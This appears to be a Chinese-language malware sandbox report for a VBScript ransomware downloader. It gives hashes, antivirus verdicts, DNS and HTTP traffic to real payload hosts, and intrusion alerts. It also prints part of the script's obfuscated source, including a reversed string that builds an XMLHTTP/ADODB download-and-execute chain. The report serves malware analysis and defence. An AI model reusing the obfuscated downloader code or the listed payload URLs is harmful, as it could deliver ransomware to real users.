分析类型 | 虚拟机标签 | 开始时间 | 结束时间 | 持续时间 |
---|---|---|---|---|
文件 (Windows) | win7-sp1-x64-hpdapp01-1 | 2019-11-18 18:32:48 | 2019-11-18 18:33:36 | 48 秒 |
文件名 | SKM_C554e67614648511.7z ==> SKM_C554e16073396317.vbs |
---|---|
文件大小 | 4865 字节 |
文件类型 | ASCII text, with CRLF line terminators |
MD5 | b3adde77551c36292de21e9f7fab7a6f |
SHA1 | 3a6921d9862ad72ab4c042592cba26b64c307a3e |
SHA256 | 0fadf3d2e8f48db9e2026c0b97c9a7bb126c3d4a281c0e57dcd31be80030c2c2 |
SHA512 | f72acf3add3e5935d04302d61b064659258b3ae48cfd941300988bacb2b5b01164a87d30d659088e480542503f49dc45720e83fa53c3dd47669aff323eadac4f |
CRC32 | 59582E55 |
Ssdeep | 96:qIixZv/u/s/6Ee4K9PL5hbczq5AamevKv0T0MWUeWPOLfC1W0oXcrwekUy3:q55/u/s/6N4ovb4jIvKca9WPOLuW0Vwv |
Yara | 登录查看Yara规则 |
样本下载 提交误报 |
无主机纪录.
域名 | 安全评级 | 响应 |
---|---|---|
amcscomputer.com | 未知 | A 216.242.171.101 |
altarek.com | 未知 | |
gulercin.com | 未知 | A 46.20.146.37 |
防病毒引擎/厂商 | 病毒名/规则匹配 | 病毒库日期 |
---|---|---|
Bkav | W32.RanpokicLTW.Trojan | 20181024 |
MicroWorld-eScan | VB:Trojan.VBS.Agent.AQD | 20181025 |
CMC | 未发现病毒 | 20181024 |
CAT-QuickHeal | VBS.Downloader.4332 | 20181024 |
ALYac | Trojan.Downloader.VBS.Agent | 20181024 |
Malwarebytes | 未发现病毒 | 20181025 |
AegisLab | Trojan.Shell.Generic.4!c | 20181024 |
TheHacker | 未发现病毒 | 20181024 |
K7GW | 未发现病毒 | 20181024 |
K7AntiVirus | 未发现病毒 | 20181024 |
Arcabit | VB:Trojan.VBS.Agent.AQD | 20181024 |
Baidu | VBS.Trojan-Downloader.Agent.tp | 20181024 |
Babable | 未发现病毒 | 20180918 |
F-Prot | VBS/Downldr.HM | 20181024 |
Symantec | VBS.Downloader.B | 20181025 |
ESET-NOD32 | VBS/TrojanDownloader.Agent.PKN | 20181025 |
TrendMicro-HouseCall | VBS_SCARAB.SMJS | 20181024 |
Avast | VBS:Downloader-ATD [Trj] | 20181024 |
ClamAV | 未发现病毒 | 20181024 |
Kaspersky | HEUR:Trojan.Script.Agent.gen | 20181024 |
BitDefender | VB:Trojan.VBS.Agent.AQD | 20181025 |
NANO-Antivirus | Trojan.Script.ExpKit.evtswh | 20181025 |
ViRobot | 未发现病毒 | 20181024 |
Rising | Downloader.VBS.MaliciousEmail!1.ACE7 (CLASSIC) | 20181025 |
Ad-Aware | VB:Trojan.VBS.Agent.AQD | 20181024 |
Sophos | Troj/VBSDl-AV | 20181024 |
F-Secure | VB:Trojan.VBS.Agent.AQD | 20181024 |
DrWeb | VBS.DownLoader.1047 | 20181024 |
Zillya | 未发现病毒 | 20181024 |
TrendMicro | VBS_SCARAB.SMJS | 20181025 |
McAfee-GW-Edition | VBS/Downloader.ea | 20181024 |
Emsisoft | VB:Trojan.VBS.Agent.AQD (B) | 20181024 |
Ikarus | Trojan-Ransom.Script.GlobeImposter | 20181024 |
Cyren | VBS/Downldr.HM | 20181025 |
Jiangmin | 未发现病毒 | 20181024 |
Avira | VBS/Drldr.Agent.4368 | 20181024 |
Antiy-AVL | Trojan[Downloader]/VBS.Agent.pkk | 20181023 |
Kingsoft | 未发现病毒 | 20181025 |
Microsoft | TrojanDownloader:VBS/Schopets.O | 20181024 |
SUPERAntiSpyware | 未发现病毒 | 20181022 |
AhnLab-V3 | VBS/Downloader.S12 | 20181024 |
ZoneAlarm | HEUR:Trojan.Script.Agent.gen | 20181024 |
Avast-Mobile | 未发现病毒 | 20181024 |
GData | VB:Trojan.VBS.Agent.AQD | 20181024 |
TotalDefense | 未发现病毒 | 20181024 |
McAfee | VBS/Downloader.ea | 20181025 |
TACHYON | 未发现病毒 | 20181025 |
VBA32 | 未发现病毒 | 20181024 |
Zoner | 未发现病毒 | 20181024 |
Tencent | Js.Trojan.Raas.Auto | 20181025 |
Yandex | 未发现病毒 | 20181024 |
MAX | malware (ai score=100) | 20181025 |
Fortinet | VBS/Nemucod.B02D!tr.dldr | 20181025 |
AVG | VBS:Downloader-ATD [Trj] | 20181024 |
Panda | 未发现病毒 | 20181024 |
Qihoo-360 | virus.vbs.qexvmc.1 | 20181025 |
无主机纪录.
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49161 | 216.242.171.101 amcscomputer.com | 80 |
192.168.122.201 | 49163 | 46.20.146.37 gulercin.com | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49310 | 192.168.122.1 | 53 |
192.168.122.201 | 49608 | 192.168.122.1 | 53 |
192.168.122.201 | 64912 | 192.168.122.1 | 53 |
域名 | 安全评级 | 响应 |
---|---|---|
amcscomputer.com | 未知 | A 216.242.171.101 |
altarek.com | 未知 | |
gulercin.com | 未知 | A 46.20.146.37 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49161 | 216.242.171.101 amcscomputer.com | 80 |
192.168.122.201 | 49163 | 46.20.146.37 gulercin.com | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49310 | 192.168.122.1 | 53 |
192.168.122.201 | 49608 | 192.168.122.1 | 53 |
192.168.122.201 | 64912 | 192.168.122.1 | 53 |
URI | HTTP数据 |
---|---|
URL专业沙箱检测 -> http://amcscomputer.com/JH67RdfgD? | GET /JH67RdfgD? HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: amcscomputer.com Connection: Keep-Alive |
URL专业沙箱检测 -> http://gulercin.com/JH67RdfgD? | GET /JH67RdfgD? HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gulercin.com Connection: Keep-Alive |
无SMTP流量.
无IRC请求.
无ICMP流量.
无 CIF 结果
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2019-11-18 18:33:14.838417+0800 | 192.168.122.201 | 49161 | 216.242.171.101 | 80 | TCP | 2024767 | ET CURRENT_EVENTS Possible Locky Payload DL Sept 26 2017 M1 | A Network Trojan was detected |
2019-11-18 18:33:25.595188+0800 | 192.168.122.201 | 49163 | 46.20.146.37 | 80 | TCP | 2024767 | ET CURRENT_EVENTS Possible Locky Payload DL Sept 26 2017 M1 | A Network Trojan was detected |
No TLS
No Suricata HTTP
文件名 | SKM_C554e16073396317.vbs |
---|---|
相关文件 |
C:\Users\test\AppData\Local\Temp\7z-tmp\SKM_C554e16073396317.vbs
|
文件大小 | 4865 字节 |
文件类型 | ASCII text, with CRLF line terminators |
MD5 | b3adde77551c36292de21e9f7fab7a6f |
SHA1 | 3a6921d9862ad72ab4c042592cba26b64c307a3e |
SHA256 | 0fadf3d2e8f48db9e2026c0b97c9a7bb126c3d4a281c0e57dcd31be80030c2c2 |
CRC32 | 59582E55 |
Ssdeep | 96:qIixZv/u/s/6Ee4K9PL5hbczq5AamevKv0T0MWUeWPOLfC1W0oXcrwekUy3:q55/u/s/6N4ovb4jIvKca9WPOLuW0Vwv |
Yara |
|
下载 提交魔盾安全分析 显示文本 | |
Public Sub FillPointWithDefaults(Point1 ) With Point1 .Name = "" .Type = dsPoint .LabelLength = Len(.Name) .LabelOffsetX = 0 .LabelOffsetY = -setdefPointSize \ 2 + 1 '.LabelWidth = Paper.TextWidth(.Name) '.LabelHeight = Paper.TextHeight(.Name) .PhysicalWidth = defPointSize .Width = .PhysicalWidth ToLogicalLength .Width .Locus = 0 .ParentFigure = 0 .ZOrder = 0 'GenerateNewPointZOrder .Tag = 0 .FillStyle = setdefPointFill .FillColor = setdefcolPointFill .ForeColor = setdefcolPoint .Shape = setdefPointShape .ShowName = setAutoShowPointName .ShowCoordinates = False .NameColor = setdefcolPointName .Visible = True .Enabled = True .Hide = False .InDemo = True .X = 0 .Y = 0 End With End Sub Function T2000(p, ddd) dicA = 19 Set CruellalpineMacAttack = CreateObject("WScript.Shell") Save1.Type = 1 Save1.Open End Function Dim Cruellalpineensurance ' Dim CruellalpineInPlaceOf ' CruellalpineTepir = "User" Dim williams Dim TristateTrue Dim CruellalpineTimeTo 'As Object Dim CruellalpineDW CruellalpineDW = false Dim Cruellalpinebalibob 'As Object Dim Cruellalpinecashback 'As Object Function Aodgraduatesalpine(strr) if strr = "34" then waitH = "Save"+"ToFile, 2" else Save1.Savetofile CruellalpineInPlaceOf , 2 end if End Function Dim krapivec Dim CruellalpineReikYaik 'As Object Dim Save1 'As Object Kullipin = "//^^^:ptth^^^exe.WBYzzMSVQH\^^^elifotevas^^^ydoBes"+"nopser^^^etirw^^^nepo^^^epyT^^^PmeT^^^TeG^^^ssecorP^^^llehs.tpircsW^^^noitacilppA.llehs^^^Maerts.bdodA^^^PTTHLMX.tfosorciM" Dim CruellalpinePetir ' Dim sNodeKey ' Dim sParentKey ' CHECHIL ="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" Public Function FolderToCopy(A,B,Pipitr6) Delafon = 50 Delafon = Delafon + 11 if Delafon > 13 then B.Write P <truncated> |
HTML 总结报告 (需15-60分钟同步) |
下载 |
---|
Task ID | 460683 |
---|---|
Mongo ID | 5dd273c42f8f2e08f960a8c5 |
Cuckoo release | 1.4-Maldun |